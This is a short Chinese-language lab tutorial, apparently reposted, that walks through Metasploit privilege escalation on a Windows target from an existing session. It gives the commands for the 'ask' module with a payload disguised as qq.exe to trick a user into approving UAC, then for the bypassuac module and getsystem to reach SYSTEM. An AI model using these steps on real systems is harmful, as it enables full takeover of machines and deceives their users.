| 关键词: 权限 用户 session 模块 接下来 运行 靶机 bypassuac Getsystem |
提权大致也就3种方法 1. 提高程序运行权限级别 2. Uac绕过 3. 提权漏洞 我这里先用第一种来演示 前提是msf已经获取到了 一个session ![]() Getiud查看用户 是用户权限 Getsystem报错 看到是没法提权的 接下来 background退到后台 use exploit/windows/local/ask 加载模块 ![]() Show options ![]() Set session 1 设置 session为 刚刚获取到得session 运行后会弹出 uac的拦截 Filename 可以设置文件的名字 伪装文件例如qq使得 用户点击确认
Set filename qq.Exe
接下来 run 运行 等待就可以了
接下来我们就可以看到靶机那边弹出用户控制的框 ![]() 点击确定 在msf那边就可以获取到一个新的sesion ![]() Getuid ![]() 还是用户权限 Getsystem ![]() 看到现在已经获取到了管理员权限 ![]() Msf绕过uac use exploit/windows/local/bypassuac 再按几下tab键 可以看到绕过uac还是有很多模块和方法的 例如进程注入 vbs绕过等等 我这里直接用bypassuac模块 ![]() Show options ![]() 这里只需要设置个session就可以了 Set session 3 Run ![]() 执行成功 反弹回来一个session Getuid ![]() 用户权限 Getsystem ![]() Getuid ![]() 获取system权限成功 |
| 本文出处: https://www.toutiao.com/a6792068953574212108/ |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|